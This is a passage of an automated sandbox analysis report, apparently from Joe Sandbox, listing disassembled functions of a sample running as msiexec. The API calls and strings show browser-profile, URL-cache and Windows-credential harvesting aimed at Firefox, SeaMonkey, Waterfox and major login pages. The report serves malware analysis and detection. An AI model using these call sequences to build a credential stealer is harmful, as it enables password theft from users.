                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 4234240956-2689659898
                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                              Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                              Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 647 446747-44674b 644->647 648 446728-44672d 644->648 653 4467ac-4467b7 __setusermatherr 645->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->654 647->643 651 44674d-44674f 647->651 648->643 650 446734-44673b 648->650 650->643 655 44673d-446745 650->655 652 446755-446758 651->652 652->645 653->654 658 446810-446819 654->658 659 44681e-446825 654->659 655->652 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 670 446853-446864 GetStartupInfoW 663->670 671 44684d-446851 663->671 664->662 665->661 665->666 666->663 668 446840-446842 666->668 668->663 672 446866-44686a 670->672 673 446879-44687b 670->673 671->668 671->670 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                              Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 1157525455-1702587658
                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                              Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 723 40e283-40e286 717->723 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 723->725 726 40e288-40e290 free 723->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 2804212203-2982631422
                                                              • Opcode ID: daaaff338075a090343ec421d43e38a5cea967048e4795b3800f3f5f146cf0a5
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: daaaff338075a090343ec421d43e38a5cea967048e4795b3800f3f5f146cf0a5
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                              Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 115830560-3916222277
                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                              Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 2936932814-4196376884
                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                              Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 828 40bdb0-40bdce call 404363 831 40bf63-40bf6f call 40440c 828->831 832 40bdd4-40bddd 828->832 834 40bdee 832->834 835 40bddf-40bdec CredEnumerateW 832->835 836 40bdf0-40bdf2 834->836 835->836 836->831 838 40bdf8-40be18 call 40b2cc wcslen 836->838 841 40bf5d 838->841 842 40be1e-40be20 838->842 841->831 842->841 843 40be26-40be42 wcsncmp 842->843 844 40be48-40be77 call 40bd5d call 404423 843->844 845 40bf4e-40bf57 843->845 844->845 850 40be7d-40bea3 memset 844->850 845->841 845->842 851 40bea5 850->851 852 40bea7-40beea memcpy 850->852 851->852 853 40bf11-40bf2d wcschr 852->853 854 40beec-40bf06 call 40b2cc _wcsnicmp 852->854 856 40bf38-40bf48 LocalFree 853->856 857 40bf2f-40bf35 853->857 854->853 859 40bf08-40bf0e 854->859 856->845 857->856 859->853
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID:
                                                              • API String ID: 697348961-0
                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                              Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 1829478387-11920434
                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 1829478387-2068335096
                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                              Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 1829478387-3369679110
                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                              Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                              Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • free.MSVCRT ref: 0041848B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
